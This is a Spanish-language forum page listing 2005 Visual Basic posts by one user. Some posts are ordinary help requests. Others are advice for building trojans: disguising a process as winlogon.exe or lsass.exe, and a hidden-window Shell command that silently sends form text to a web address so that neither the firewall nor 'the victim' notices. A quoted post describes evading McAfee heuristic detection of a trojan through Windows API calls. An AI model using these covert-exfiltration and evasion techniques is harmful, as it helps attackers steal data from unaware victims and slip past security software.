Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - yeikos

#381
El FSG lo podeis bajar de aquí.
#382
No recuerdo el nombre pero te puedo decir el nombre del control: COMDLG32.OCX .
#383
Programación Visual Basic / Re: Formularios
3 Septiembre 2005, 23:52 PM
#384
Si lo haces con la aplicación "explorer.exe" la ventana no podrá permanecer oculta.
#385
Ponle nombres de procesos de Windows, así como... winlogon.exe, lsass.exe, etc.
#386
Encontré una solución para no tener que usar el winsock:

shell "C:\Archivos de programa\Internet Explorer\IEXPLORE.EXE http://www.website.com/get.php?info=" & texto1.text, vbHide

De esta manera se pueden enviar datos silenciosamente sin que detecte nada el firewall, sin usar ningun control y sin que la victima vea nada.
#387
Cita de: xavierote en  3 Septiembre 2005, 02:17 AM
YeIKoS, yo no te obligo a que utilices estos módulos. Más que nada los he puesto aquí porque yo lo que veo interesante es que por ejemplo, si no sabes utilizar las api's de windows, esto es un buenísimo ejemplo de como utilizarlas, y sobre todo interesante sobre el control de ficheros, en el que se incluyen casi todas las api's.
Ya se que con una sola línea de código se pueden borrar los archivos con el comando kill y más comandos de una sóla línea... pero lo que te dicho antes...
De todas formas, utilicé varios comandos del visual basic para el control de archivos cuando hice mi troyano y lo detectaba, con el escaneo heurístico, el McAfee 9.0 como un archivo que contiene comandos peligrosos. Solución: llamadas a unas cuantas api's y arreglado.

Saludos!

Mi respuesta a podido sonar mal intencionada, pero solo me preguntaba porque usar las APIS pudiendo usar otras formas más simples, a parte para que no lo detecten los antivirus, ¿hay alguna otra ventaja? .
#388
Lee esto, te puede servir de ayuda.
#389
Expón algo del código para poder situarnos algo mejor...
#390
Como pareces tan lista te lo diré, esta es una manera:
Shell "cmd.exe /c explorer http://miweb.com", vbHide